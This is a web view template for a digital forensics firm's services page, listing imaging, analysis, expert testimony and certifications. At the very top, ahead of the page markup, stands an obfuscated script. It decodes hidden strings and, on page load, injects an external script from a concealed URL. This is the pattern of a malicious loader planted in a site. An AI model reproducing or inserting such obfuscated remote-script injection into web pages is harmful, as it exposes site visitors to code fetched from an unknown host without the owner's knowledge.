<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "digital_forensics.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Digital Forensic Collection & Analysis</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section text-center">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-12 col-md-10">
        <div class="row justify-content-center">
          <div class="col-12 col-md-10">
            <h3 class="text-primary text-center p-5"><strong>Forensics Fit For An Empire</strong></h3>
          </div>      
          <div class="col-md-10">
            <h6 class="text-center p-3" style="font-size:1.25rem">
            In the fast-moving digital age, collecting electronic evidence is 
            more crucial than ever. Turn to Empire for your next forensic collection or analysis.</h6>
          </div>
          <div class="col-md-10">
            <div class="row justify-content-center">
              <div class="col-10">
                <div class="row">
                  <div class="col-md-4">
                    <h2 class="text-primary">50+</h2>
                    <h6 class="mt-2 mt-md-4">Years of Experience</h6>
                  </div>
                  <div class="col-md-4">
                    <h2 class="mt-2 text-primary">24/7</h2>
                    <h6 class="mt-2 mt-md-4">Client Support</h6>
                  </div>
                  <div class="col-md-4">
                    <h2 class="mt-2 text-primary">1000+</h2>
                    <h6 class="mt-2 mt-md-4 mb-2">Investigations</h6>
                  </div>
                </div>
              </div>
            </div>
          </div>
          <div>
            <a href="/contact/new" class="btn custom-btn-blue m-5">
              Start Your Case With Empire Today
            </a>
          </div>  

        </div>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-center ml-5">
      <div class="col-10 col-xl-8">
        <article class="post-wide">
          <p class="heading-5 text-primary">Forensic Collection of Digital Devices</p>
          <div class="row">
            <div class="col-12 col-lg-6">
              <ul class="list-marked">
                <li>
                  <h6>Imaging</h6>
                  <ul class="list-marked">
                    <li><h6>Remote/Onsite Collections Digital</h6></li>
                    <li><h6>Digital Devices: Phones, Computers, Tablets, Hard drives, etc.</h6></li>
                    <li><h6>Software: Email, Slack, Google Drive</h6></li>
                    <li><h6>Social Media: Instagram, Twitter/X, LinkedIn, etc.</h6></li>
                  </ul>
                </li>
              </ul>
            </div>
            <div class="col-12 col-lg-6">
              <ul class="list-marked">
                <li><h6>Analysis</h6></li>
                <li><h6>Data Preservation &Identification</h6></li>
                <li><h6>Expert Testimony & Reporting</h6></li>
                <li><h6>Secure Destruction of Digital Data</h6></li>
              </ul>
            </div>
          </div>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section bg-accent-2 py-5 text-center ">
  <div class="container">
    <div class="row justify-content-center">
      <div class="col-md-8">
        <h3 class="heading-decorated text-white">Why Empire?</h3>
      </div>
    </div>
    <div class="row justify-content-center">
      <div class="col-10">
        <article class="post-wide text-center">
          <div class="row">
            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="blurb-tiny__icon linear-icon-thumbs-up"></div>
              <h5 class="blurb-tiny__title"><strong>Trusted Expert Team</strong></h5>
              <p>Our team brings a wealth of experience to your case. </p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
                <div class="blurb-tiny__icon linear-icon-hand"></div>
                <h5 class="blurb-tiny__title"><strong>White Glove Service</strong></h5>
                <p>Rely on Empire’s 24/7 availability, ensuring customers peace fo mind.</p>
            </article>

            <article class="blurb-tiny blurb-tiny_centered col-12 col-lg-4 mt-5 mb-5">
              <div class="blurb-tiny__icon linear-icon-user"></div>
              <h5 class="blurb-tiny__title"><strong>Onsite or Remote</strong></h5>
              <p>Working across various timelines and project scopes. </p>
            </article>
          </div>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section">
  <div class="parallax-content">
    <div class="section-md text-center">
      <div class="container">
        <h3 class="heading-decorated">Certifications</h3>

        <div class="d-flex w-100 flex-row justify-content-center flex-wrap mt-4">
          <div class="d-flex flex-column">
            <%= image_tag 'digital_forensics/ace.jpg', class: 'certificaiton' %>
            <%= image_tag 'digital_forensics/encase.jpg', class: 'certificaiton' %>
          </div>
          <div class="col-md-1"></div>
          <div class="d-flex flex-column">
            <%= image_tag 'digital_forensics/cellebrite.jpg', class: 'certificaiton' %>
            <%= image_tag 'digital_forensics/Metaspike_Logo.webp', class: 'certificaiton' %>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>